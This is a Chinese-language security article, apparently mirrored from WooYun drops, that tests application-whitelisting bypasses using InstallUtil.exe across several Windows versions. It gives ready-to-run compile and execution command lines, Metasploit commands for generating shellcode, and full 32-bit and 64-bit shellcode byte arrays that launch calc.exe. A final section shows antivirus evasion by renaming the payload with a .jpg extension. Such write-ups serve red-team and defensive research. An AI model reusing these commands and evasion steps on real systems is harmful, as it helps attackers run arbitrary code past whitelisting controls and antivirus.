利用白名单绕过限制的更多测试 | WooYun知识库
source link:
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
利用白名单绕过限制的更多测试
0x00 前言
subTee在博客中不仅介绍了如何利用InstallUtil.exe直接执行pe文件,还提到了另一种利用方式——利用InstallUtil执行shellcode 从subTee分享的代码可以看出其测试环境为64位、.net4.0环境,在360安全播报上发表的文章也认为执行环境必须是.net4.0以上,适用范围很窄 但我并不这么认为
下面我们通过实际测试得出我们的新结论。
注:上述涉及的链接:
- http://subt0x10.blogspot.hk/2015/08/application-whitelisting-bypasses-101.html
- http://bobao.360.cn/learning/detail/620.html
0x01 测试目标
测试两种利用InstallUtil的方式,研究其使用环境
0x02 测试环境
xp x86
win7 x86
win7 x64
win8 x86
win8 x64
0x03 测试方法
1、利用InstallUtil.exe执行pe文件
执行代码:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:PELoader.exe PELoader.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PELoader.exe
注:上篇有详细介绍,本次不做具体介绍
2、利用InstallUtil.exe直接执行shellcode
下载链接:https://gist.github.com/subTee/a06d4ae23e2517566c52
下载文件保存为Shellcode.cs,按照其描述执行代码:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /platform:x64 /out:exeshell.exe Shellcode.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
0x04 实际测试
注:根据不同操作系统版本,需要对上述利用代码作相应修改
1、xp x86
默认不包含.net环境,暂不测试,但可为最终结论提供参考
2、win7 x86
默认.net环境
如图
(1)利用InstallUtil.exe执行pe文件
.net 3.5无法成功编译PELoader.cs
如图
(2)利用InstallUtil.exe直接执行shellcode
通过msf生成32位shellcode
use windows/exec
set CMD calc.exe
set EXITFUNC thread
generate -t csharp
如图
byte[] buf = new byte[195] {
0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,
0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,
0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,
0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,
0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,
0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,
0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,
0x00,0x53,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x20,0x63,0x00 };
替换Shellcode.cs中的byte[] shellcode
使用.net 2.0中的csc.exe和InstallUtil.exe,执行代码:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /out:exeshell.exe Shellcode.cs
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
成功执行shellcode,弹出计算器
如图
360成功查杀,如图
2、win7 x64
默认.net环境
如图
(1)利用InstallUtil.exe执行pe文件
.net 3.5无法成功编译PELoader.cs
(2)利用InstallUtil.exe直接执行shellcode
通过msf生成64位shellcode
use windows/x64/exec
set CMD calc.exe
set EXITFUNC thread
generate -t csharp
如图
byte[] buf = new byte[276] {
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,
0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,
0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,
0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,
0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,
0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,
0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,
0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,
0x63,0x2e,0x65,0x78,0x65,0x00 };
替换Shellcode.cs中的byte[] shellcode
使用.net 2.0 x64中的csc.exe和InstallUtil.exe,执行代码:
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe /unsafe /platform:x64 /out:exeshell.exe Shellcode.cs
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
成功执行shellcode,弹出计算器
如图
如果使用.net 2.0 x86中的csc.exe和InstallUtil.exe,执行代码:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x64 /out:exeshell.exe Shellcode.cs
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
会报错,如图
测试exeshellx64.exe查杀情况,360干的不错,查杀,如图
3、win8 x86
默认.net环境,支持4.0
如图
(1)利用InstallUtil.exe执行pe文件
执行代码:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /unsafe /out:PELoader.exe PELoader.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PELoader.exe
32位系统下执行发生异常
如图
(2)利用InstallUtil.exe直接执行shellcode
使用.net 4.0中的csc.exe和InstallUtil.exe,执行代码:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /unsafe /out:exeshell.exe Shellcode.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
成功执行shellcode,弹出计算器
如图
测试win8x86exeshell.exe查杀情况,360干的漂亮,查杀,如图
4、win8 x64
默认.net环境,支持4.0,如图
(1)利用InstallUtil.exe执行pe文件
.net 4.0成功执行
如图
(2)利用InstallUtil.exe直接执行shellcode
使用.net 4.0 x64中的csc.exe和InstallUtil.exe,执行代码:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /platform:x64 /out:exeshell.exe Shellcode.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
报错,如图
使用.net 4.0 x86中的csc.exe和InstallUtil.exe,执行代码:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /unsafe /out:exeshell.exe Shellcode.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
报错,如图
为了得出正确的结论,在win8 x64系统上面安装.net framework x64 2.0
使用其中的csc.exe和InstallUtil.exe,执行代码:
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe /unsafe /platform:x64 /out:exeshell.exe Shellcode.cs
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
成功执行shellcode,弹出计算器
如图
0x05 补充
上述测试中操作系统自带的.net环境并不绝对,如果安装应用 也会默认安装相应版本的.net 环境
0x06 测试结论
(1)利用InstallUtil.exe执行pe文件
适用于64位系统、Microsoft .NET Framework 4.0环境
(2)利用InstallUtil.exe直接执行shellcode
适用于.NET Framework 2.0及特定环境
0x07 关于免杀
仅给出一种简单有效的方法
参照上篇内容的思路,执行代码如下:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /platform:x64 /out:exeshell.jpg Shellcode.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.jpg
更改文件后缀名即可逃过静态查杀,至于主动防御,全过程依然未触发
如图
正常打开是一张损坏的图片
查杀测试如图
但实际上,可以通过这种方式打开,如图
0x08 小结
关于该项技术的利用方式还有很多,思路最重要
关于突破白名单的限制,其他方法比如利用PowerShell、Exploit/Migrate、WMI Providers、.COM代理突破白名单的限制的方法都很值得研究。
本文由三好学生原创并首发于乌云drops,转载请注明
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK